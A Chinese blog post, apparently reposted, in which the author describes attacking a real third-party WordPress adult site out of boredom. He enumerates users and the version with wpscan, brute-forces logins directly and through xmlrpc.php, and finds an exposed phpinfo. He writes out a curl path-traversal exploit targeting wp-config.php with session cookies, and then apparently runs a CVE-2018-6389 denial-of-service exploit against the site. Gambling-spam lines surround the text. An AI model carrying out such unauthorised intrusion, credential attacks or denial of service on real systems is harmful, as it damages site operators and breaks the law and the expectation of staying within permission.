在家闲的没事琢磨色网站的我

澳门十大网赌网址:2020-02-01 澳门十大正规网站: 10388 次

大家好,我是在家闲的没事的天钧,因为太闲了,用关键词,找了个*色网站,搞着玩。

重马赛克,首页长这个样子

首先注册了个账号,试试。云溪扫描如下,有意思的来了

通用后台地址试试/wp-admin.php被自动跳转到用户登录页面了,在看看/wp-admin/install.php

覆盖安装尝试失败了

但是确认是默认安装方式

WordPress默认安装情况下,根目录会留有开发人员编写的readme.html文件,通过访问该文件,大家可以大概的知道站点的WordPress版本号。

但是在4.7之后的版本就不会显示了。

这里没有显示,用wpscan扫了下,出了版本

果然比4.7高。额,先去看看有没有别的有意思的漏洞

随便输了个数字用户倒是很多,但是主要负责更新的账户只有一个,用户名为yi,拿wpscan扫扫这个站

先去看下别的。看完后没什么意思,转到登陆框,尝试admin的账户破解,在用户读取的时候确认了有admin的账户

使用小米范大佬写的弱密码进行爆破尝试

 

爆破并没有成功,烦躁,继续,找到了xmlrpc.php文件使用它进行爆破

利用下,看看

发现hackbar居然要钱了,呜呜呜穷逼找了个代替的,本来是想用burp的,但是咋弄也连不上,苦恼。

但是我却找到了他的phpinfo文件了,这管理员是多粗心 版本7.3.7

漏洞倒是不少,用通杀试试

  •  
 curl -v "http://127.0.0.1/AllCMS/wordpress/wp-admin/post.php?post=4" -H "cookie:wordpress_740bcb2571e381529497b6b37b468e91=andy%7C1532135657%7CImRdA39DcGX49tYIkvpmjYiiAWfVqYZl6zOQhoXWvhx%7C5d84d42cfd206a46b5ff58555265887d796e9963772c58eed1795fd51a6a6c0a; wp-settings-time-1=1531966453; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_740bcb2571e381529497b6b37b468e91=andy%7C1532135657%7CImRdA39DcGX49tYIkvpmjYiiAWfVqYZl6zOQhoXWvhx%7Cd619b7954cb029edc28d923c5c45102c287110e124f012310aeaac1ee261887d; EJfX_2132_saltkey=w788x9t8; EJfX_2132_lastvisit=1531658111; hibext_instdsigdipv2=1; EJfX_2132_ulastactivity=8d850QpqXg15uPhEnqPt06yqLGsQxp3dko9XHY1WvSkslMa%2FWls0; Dl6Y_2132_saltkey=kj2hJJBQ; Dl6Y_2132_lastvisit=1531700649; Dl6Y_2132_ulastactivity=a1c1FdoVaiPz3buc%2FbOAzOuCRV9lu%2BXjPkbAZPdLCiN3sSGZE%2BAx; _ga=GA1.1.1487148300.1531791208; _gid=GA1.1.579984730.1531887964; security_level=0; wordpress_logged_in_740bcb2571e381529497b6b37b468e91=andy%7C1533129085%7CYQZJuAiCl0ev8J49HqsLCdHwMIuQLgFNoYtiMx7t2DB%7C8a009796bbdd71150a609fd9b05250f17b55307b8908c37e4fb57ec4871f6439" -d "action=editattachment&_wpnonce=05447e2e53&thumb=../../../../wp-config.php"

这个没用,但是他有通杀DOS漏洞CVE-2018-6389

苦笑,再弄会,已经坐了半天了,弄不出来再利用6389,然后找了一会,对象来电话了,她忙完了,我急忙下了个exp

然后去大佬博客观摩下

 

操作

打死

匆匆离去,等我有空再搞!!!!

 

转自:黑白之道

分享到:
×

微信扫一扫分享

XML 地图 | Sitemap 地图